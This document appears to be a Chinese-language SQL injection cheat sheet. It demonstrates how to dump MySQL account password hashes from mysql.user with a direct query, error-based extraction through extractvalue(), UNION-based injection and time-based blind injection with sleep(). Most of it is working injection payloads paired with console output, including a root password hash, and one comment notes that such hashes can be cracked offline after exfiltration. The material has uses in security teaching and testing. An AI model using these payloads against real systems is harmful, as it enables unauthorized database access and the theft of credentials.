0x00 记忆方式
-- Enumerate every MySQL account together with its stored password hash.
-- Requires SELECT on the mysql schema, which ordinary application accounts
-- normally lack; the listing below was taken as root.
-- The 41-char `*`-prefixed value is a mysql_native_password hash
-- (SHA1(SHA1(pw))) and can be cracked offline once exfiltrated.
-- NOTE(review): on MySQL 5.7+ / MariaDB 10.4+ the hash is stored in
-- `authentication_string` and a `password` column no longer exists — confirm
-- the target version before relying on this column name.
SELECT host, user, password
FROM mysql.user
mysql> select host, user, password from mysql.user;
+-----------+------+-------------------------------------------+
| host | user | password |
+-----------+------+-------------------------------------------+
| localhost | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| 127.0.0.1 | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| ::1 | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
+-----------+------+-------------------------------------------+
3 rows in set (0.00 sec)
0x01 爆错注入获取
注意: limit 0,1 中的偏移量表示要显示哪一条数据
limit 0,1 表示第一条
limit 1,1 表示第二条
另注: extractvalue() 的报错信息只回显前 32 个字符（见下方输出，hash 在 `*81F5E21E35407D8` 处被截断），完整的 41 位 hash 需要用 substring(...,1,32) 与 substring(...,33,32) 分两次读取
-- Error-based extraction: the concatenated credential row is passed to
-- extractvalue() as an invalid XPath expression, so the server echoes it back
-- inside the XPATH syntax error text.
-- The error message carries only the first 32 characters (the hash in the
-- sample output is cut off), so a full 41-char hash must be fetched in two
-- pieces with substring(<row>, 1, 32) and substring(<row>, 33, 32).
-- `limit 0, 1` selects the first row; `distinct` changes nothing here because
-- host differs per row in the mysql.user listing above.
SELECT extractvalue(
    1,
    (SELECT DISTINCT concat(0x7e, host, 0x7e, user, 0x7e, password)
     FROM mysql.user
     LIMIT 0, 1)
)
mysql> select extractvalue(1,(select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1));
ERROR 1105 (HY000): XPATH syntax error: '~localhost~root~*81F5E21E35407D8'
0x02 union联合注入获取
注意: limit 0,1 中的偏移量表示要显示哪一条数据
limit 0,1 表示第一条
limit 1,1 表示第二条
另注: union 右侧的列数必须与原查询一致（下例为 4 列，先用 union select 1,2,3,4 确认），where 1=2 使原查询不返回任何行，结果集中只剩注入的那一行
# 演示数据
mysql> select * from test;
+------+------+------+---------+
| id | test | map | content |
+------+------+------+---------+
| 1 | 1 | 1 | 1 |
| 2 | 2 | 2 | 2 |
| 3 | 3 | 3 | 3 |
+------+------+------+---------+
3 rows in set (0.00 sec)
# 显示列数
mysql> select * from test where 1=2 union select 1,2,3,4;
+------+------+------+---------+
| id | test | map | content |
+------+------+------+---------+
| 1 | 2 | 3 | 4 |
+------+------+------+---------+
1 row in set (0.00 sec)
# 显示数据
mysql> select * from test where 1=2 union select 1,(select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),3,4;
+------+-----------------------------------------------------------+------+---------+
| id | test | map | content |
+------+-----------------------------------------------------------+------+---------+
| 1 | ~localhost~root~*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B | 3 | 4 |
+------+-----------------------------------------------------------+------+---------+
1 row in set (0.00 sec)
0x03 盲注获取
# 测试数据
mysql> select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1;
+-----------------------------------------------------------+
| concat(0x7e,host,0x7e,user,0x7e,password) |
+-----------------------------------------------------------+
| ~localhost~root~*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
+-----------------------------------------------------------+
1 row in set (0.00 sec)
读 mysql.user 表第一条数据的第一个字符: select * from test where id = 1 and if(substring((select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),1,1)='~',sleep(5),1); （判断依据是响应耗时而不是结果集：猜对时 sleep(5) 返回 0，and 条件为假，因此显示 Empty set 且耗时约 5 秒；猜错时 if() 返回 1，立即返回 id=1 的那一行。substring 的下标从 1 开始。）
mysql> select * from test where id = 1 and if(substring((select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),1,1)='~',sleep(5),1);
Empty set (5.00 sec)
读 mysql.user 表第一条数据的第二个字符: select * from test where id = 1 and if(substring((select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),2,1)='l',sleep(5),1); （逐字符递增 substring 的起始位置即可读完整行；生产环境中逐字符猜解会产生大量慢查询，易被日志和 WAF 发现。）
mysql> select * from test where id = 1 and if(substring((select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),2,1)='l',sleep(5),1);
Empty set (5.00 sec)